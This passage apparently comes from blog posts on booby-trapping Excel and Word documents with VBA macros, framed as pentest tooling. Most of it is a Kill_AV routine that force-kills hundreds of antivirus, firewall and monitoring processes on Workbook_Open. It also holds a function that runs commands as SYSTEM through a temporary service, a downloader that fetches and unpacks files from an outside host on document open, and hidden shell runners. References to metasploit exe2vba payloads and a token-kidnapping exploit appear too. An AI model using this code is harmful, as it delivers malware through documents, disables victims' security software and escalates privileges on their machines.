Build_Cmd_List arrayCmds, "taskkill /F /IM ""luinit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luspt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mapisvc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcmnhdlr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcshield.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mctool.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsrte.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsshld.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""md.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfw2en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfweng3.02d30.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrtcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrte.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mghtml.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""minilog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mmod.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""monitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mostat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mrflux.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msbb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msblast.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscache.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msccn32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscman.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msconfig.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdos.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msiexec16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msinfo32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mslaugh.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmgt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmsgri32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssmmc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssys.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msvxd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mu0311ad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navap.navapsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navdx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navstub.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nc2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ncinst4.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ndd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""neomonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""neowatchlog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netarmor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netinfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netscanpro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netspyhunter-1.2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netutils.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nod32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""norton_internet_secu_3.0_407.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""notstart.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npf40_tw_98_nt_me_2k.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npfmessenger.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nprotect.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npscheck.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npssvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nssys32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nstask32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntrtscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntvdm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntxconfig.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvarch16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvsvc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwinst4.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwtool16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ollydbg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""onsrvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""optimize.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ostronet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""otfix.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostproinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""panixk.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""patch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavproxy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcip10117_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pdsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""periscope.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""perswf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pf2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pfwadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pgmonitr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pingscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""platin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pop3trap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""poproxy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""popscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""portdetective.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""portmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""powerscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppinupdt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pptbc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppvstop.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prizesurfer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""procdump.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""processmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""procexplorerv1.0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""programauditor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""proport.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""protectx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pspf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""purge.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""qconsole.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""qserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rapapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav8win32eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rcsync.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""realmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""reged.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedt32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rrguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rshell.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscn95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rulaunch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""run32dll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ruxdll32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sahagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""save.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""savenow.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sbserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scam32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""setup_flowprotector_us.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""setupvameeval.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sfc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sgssfw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sh.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""shellspyinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""shn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""showbehind.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sms.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smss32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""soap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sofi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sperm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoler.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolcv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolsv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spyxx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""srexe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""srng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ss3edit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssg_4104.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssgrate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""st2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""start.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""stcloader.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""supftrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""support.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""supporter5.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchostc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchosts.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svshost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweepnet.sweepsrv.sys.swnetsup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""symproxysvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""symtray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysedit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""system.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""system32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taumon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tcm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds-3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""teekids.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak5.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tgbob.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""titanin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""titaninxp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tracert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trickler.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trojantrap3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tsadbot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvtmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""undoboot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""updat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""upgrad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""utpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcmserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcons.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbust.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwin9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwinntw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vcsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vfsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vir-help.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""virusmdpersonalfirewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnlan300.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnpc3000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc42.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpfw30s.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vptray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscenu6.02d30.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsisetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswin9xe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinntse.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinperse.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""w32dsm89.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""w9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""watchdog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webdav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webtrap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""whoswatchingme.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wimmun32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32us.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winactive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win-bugsfix.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""window.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""windows.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininetd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininitx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winlogin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winppr32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winrecon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winservn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winssk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart001.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wintsk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wkufind.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wradmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wrctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wsbgate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdater.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wyvernworksfirewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""xpf202en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapsetup3001.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zatutor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonalm2601.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""

Run_Sys_Cmds arrayCmds, INVISIBLE, WAIT
End Function


Call it with a simple:
Sub Workbook_Open()
Kill_AV
End Sub

Running commands as SYSTEM from VBA in Word or Excel

Sometime's it is useful to run commands with SYSTEM level privilege because, for some reason, simply having Administrator won't allow you to do something you need. I often run into this with trying to kill antivirus processes or similar, as they usually require some sort of password to shut them off. If you kill it from under the SYSTEM account, however, it'll shut off without any problems:

Function Run_Sys_Cmds(arrayCmds As Variant, visibility, wait_on_execute)

Set fso = CreateObject("Scripting.FileSystemObject")
Set systemCmd = fso.CreateTextFile(Environ("TEMP") & "\systemCmd.vbs")
Set batchRun = fso.CreateTextFile(Environ("TEMP") & "\systemBatch.bat")

systemCmd.WriteLine ("CreateObject(""Wscript.Shell"").Run """ & Environ("TEMP") & "\systemBatch.bat" & """, " & visibility & ", " & wait_on_execute)

For Each cmd In arrayCmds
batchRun.WriteLine (cmd)
Next cmd

systemCmd.Close
batchRun.Close

Run_Cmd "sc create systemCmd binpath= ""%COMSPEC% /c wscript %TEMP%\systemCmd.vbs "" type= own type= interact", INVISIBLE, WAIT
Run_Cmd "sc start systemCmd", INVISIBLE, WAIT
Run_Cmd "sc delete systemCmd", INVISIBLE, WAIT
Kill Environ("TEMP") & "\systemCmd.vbs"
Kill Environ("TEMP") & "\systemBatch.bat"

End Function

This version only accepts an array of commands to be processed. I found that it was way too slow to process a large number of commands unless you did it this way. It would be simple to modify to accept a regular String instead, if you wish to change it to use it for one-off commands.

You'd call this with something like:
    Dim syscmd(1) As String
syscmd(0) = "set && pause"
syscmd(1) = "ping 127.0.0.1"
Run_Sys_Cmds syscmd, VISIBLE, WAIT

It executes commands at the SYSTEM level by creating a service that will run your command for you. Unless you specify otherwise, services always run as the SYSTEM account. Creating services is only possible if you have Administrator-level privileges on the system, so I really only find this useful to get around locked files or antivirus.

It's on my TO DO list to play with the token-kidnapping exploit for Windows Server 2003/2008 (and supposedly XP2?) that allows any authenticated user to gain SYSTEM privileges. Unfortunately, I haven't had time to play with it yet.

VBA Function to Download Files

So, what happens if the payload you want to run is too large to directly paste into an Excel or Word document with metasploit's exe2vba? Why don't you just download it from the internet?

Unfortunately, MS didn't decide to give us a copy of wget, so we have to write it ourselves. This function uses the XMLHTTP object to download binary files and write them to disk. I don't remember where I found this code, but just for full disclosure, I didn't write it:

Function Download_File(ByVal vWebFile As String, ByVal vLocalFile As String) As Boolean
Dim oXMLHTTP As Object, i As Long, vFF As Long, oResp() As Byte

'You can also set a ref. to Microsoft XML, and Dim oXMLHTTP as MSXML2.XMLHTTP
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", vWebFile, False 'Open socket to get the website
oXMLHTTP.Send 'send request

'Wait for request to finish
Do While oXMLHTTP.readyState <> 4
DoEvents
Loop

oResp = oXMLHTTP.responseBody 'Returns the results as a byte array

'Create local file and save results to it
vFF = FreeFile
If Dir(vLocalFile) <> "" Then Kill vLocalFile
Open vLocalFile For Binary As #vFF
Put #vFF, , oResp
Close #vFF

'Clear memory
Set oXMLHTTP = Nothing
End Function


Here's the call that will download a copy of the Tiny Web Server to the %TEMP% directory and use the local installation of Winzip to install it:

Sub Workbook_Open()
'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
'Obviously in a real world application you'd want to bring your own unzipper
Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"
Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
End Sub

On VBA in Excel and Word Documents...

There have been a few posts around the interwebs recently on how to use VBA to boobytrap Excel or Word documents with executables that will run on startup. I've been playing with it a bit and thought I'd write a series of posts on my findings to store this info in one place, in case anyone else finds this stuff useful in pentests.

First, a quick note on converting executables to store in VBA. Based on my testing, the default Visual Basic Editor (VBE) that comes with MS Office 2003 (haven't tested 2007 yet) has a relatively low memory limit on how much you can store inside the script sections. This correlates to a max executable filesize of around 32k on my system. Anything larger than that you won't be able to paste in the output from metasploit's exe2vba because you will recieve an error message, "Not Enough Memory".

I'm sure you could convert this script to allow you to store the hex strings inside a hidden, locked worksheet and reference it from the code sections. I don't know how many of you will run into this, as many of the metasploit payloads are only around ~10k.

Back to VBA, we'll start with a couple of simple functions that will allow you to run invisible commands or programs on the system:

Sub Run_Cmd(command, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub

Sub Run_Program(program, arguments, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
